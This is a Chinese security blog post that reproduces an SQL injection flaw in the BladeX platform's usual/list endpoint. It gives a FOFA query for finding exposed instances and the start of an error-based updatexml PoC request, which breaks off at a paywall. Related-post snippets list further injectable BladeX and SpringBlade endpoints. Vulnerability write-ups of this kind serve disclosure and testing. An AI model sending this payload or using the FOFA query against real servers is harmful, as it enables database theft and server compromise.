BladeX企业级开发平台 usual/list SQL 注入漏洞复现

已于 2024-08-04 18:42:59 修改
阅读量131 收藏
点赞数
分类专栏: 漏洞复现 文章标签: sql 安全 web安全
于 2024-08-01 18:34:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140854553
版权

0x01 产品简介

BladeX是一款精心设计的微服务架构,提供 SpringCloud 全套解决方案,开源中国首批完美集成 SpringCloud Alibaba 系列组件的微服务架构,基于稳定生产的商业项目升级优化而来,更加贴近企业级的需求,追求企业开发更加高效。

0x02 漏洞概述

BladeX企业级开发平台 usual/list 存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:body="https://bladex.vip"

0x04 漏洞复现

PoC

GET /api/blade-log/usual/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfa
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
BladeX企业级开发平台 error/list SQL 注入漏洞复现
0xSec
03-12 1053
BladeX企业级开发平台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
BladeX企业级开发平台 dict-biz/list SQL 注入漏洞复现
0xSec
04-16 1421
BladeX企业级开发平台/api/blade-system/dict-biz/list 路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现】SpringBlade tenant/list SQL 注入漏洞
最新发布
siu~
06-03 742
SpringBlade 后台框架 /api/blade-system/tenantist路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
复现】SpringBlade SQL 注入漏洞_22
fushuang333的博客
01-18 2374
复现】SpringBlade SQL 注入漏洞,SpringBlade 是由一个商业级项目升级优化而来的SpringCloud微服务架构,采用Java8 API重构了业务代码,完全遵循阿里巴巴编码规范。
漏洞复现】SpringBlade error_list SQL 注入漏洞
https://blog.echo234.cn/
03-26 616
​ SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。框架后台/api/blade-log/error/list路径存在安全漏洞,攻击者利用该漏洞进行SQL注入攻击。
Usual Tool CMS 企业网站源码 v8.0Release
12-08
为您提供Usual Tool CMS 企业网站源码下载,升级公告:UTCMS框架升级,前端模块实现分离挂载,Apache/Nginx/WIN 伪静态规则更新。主体文件缩减至1.6M,功能模块增加至18个,系统底层模块6个,开发更便利、快速、精准...
易语言模块USUAL.rar
03-29
易语言是一种基于中文编程的计算机程序设计语言,其目标是使普通用户也能轻松进行软件开发。"易语言模块USUAL.rar" 是一个压缩包文件,其中包含了一个名为 "模块USUAL" 的文件,该文件很可能是易语言的一个扩展模块...
two.rar_Linux/Unix编程_LINUX_
08-09
在IT行业中,Linux/Unix操作系统是开发者和系统管理员的重要平台,尤其对于服务器管理和软件开发而言。标题中的"two.rar_Linux/Unix编程_LINUX_"显然指向一个压缩包,其中包含了与Linux/Unix编程相关的资料。这个...
USUAL.zip易语言程序源码资源下载
02-25
再者,对于新手或自学编程的人来说,易语言的源码资源提供了实践和模仿的平台。编程学习往往从模仿开始,通过阅读和分析别人的代码,新手可以逐渐理解编程的基本概念,如变量、函数、流程控制等,并逐步掌握编程的...
漏洞复现】SpringBlade export-user接口SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
01-22 1299
SpringBlade 是一个由商业级项目升级优化而来的微服务架构 采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台
【SpringBlade-权限缺陷】API鉴权逻辑缺陷漏洞
06-29 7080
【API鉴权】
漏洞复现】SpringBlade dict-biz SQL注入漏洞
qq_67810151的博客
04-22 523
SpringBlade dict-biz接口存在SQL注入漏洞。未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
转载:SpringBlade框架JWT认证缺陷漏洞CVE-2021-44910
HRay's blog
01-29 7899
SpringBlade框架JWT认证缺陷漏洞CVE-2021-44910
SpringBlade export-user SQL 注入漏洞
holyxp的博客
01-10 967
SpringBlade 是一个由商业级项目升级优化而来的 SprinaCloud 分布式微服务架构、Springoot 单体式微服务架构并存的综合型项四。SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞Q,攻击者利用该漏洞可通过组件customSalSegment 进行SQL注入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。
BladeX企业级开发平台 export-user SQL 注入漏洞复现
0xSec
12-19 1728
BladeX企业级开发平台 v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞,攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。
SpringBlade error/list SQL 注入漏洞复现
qq_39894062的博客
04-04 719
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
spring框架漏洞整理(Spring Framework漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1471
spring框架漏洞整理之Spring Framework漏洞(CVE-2015-5211)Spring Framework 内容协商机制(content-negotiation)反射型文件下载(RFD)。 RFD,即 Reflected File Download 反射型文件下载漏洞,是一个 2014 年来自 BlackHat 的漏洞。这个漏洞在原理上类似 XSS,在危害上类似 DDE:攻击者可以通过一个 URL 地址使用户下载一个恶意文件,从而危害用户的终端 PC。 这个漏洞很罕见,大多数公司会认为它是
Tablespace 2850 was not found at ./bladex_log/blade_log_usual.ibd.
05-23
这个错误提示说明在执行某个操作时,MySQL数据库无法找到名为"Tablespace 2850"的表空间。这可能是由于以下原因之一导致的: 1. 表空间文件已被删除或移动。 2. 数据库中的表空间信息已损坏。 3. MySQL版本不兼容。 您可以尝试执行以下步骤来解决此问题: 1. 检查您的数据库配置和文件系统,确保表空间文件存在并且未被删除或移动。 2. 使用MySQL提供的工具修复数据库中的表空间信息。 3. 确保您正在使用与MySQL版本兼容的工具和应用程序。 如果以上步骤无法解决问题,请考虑联系MySQL社区获取更多帮助和支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值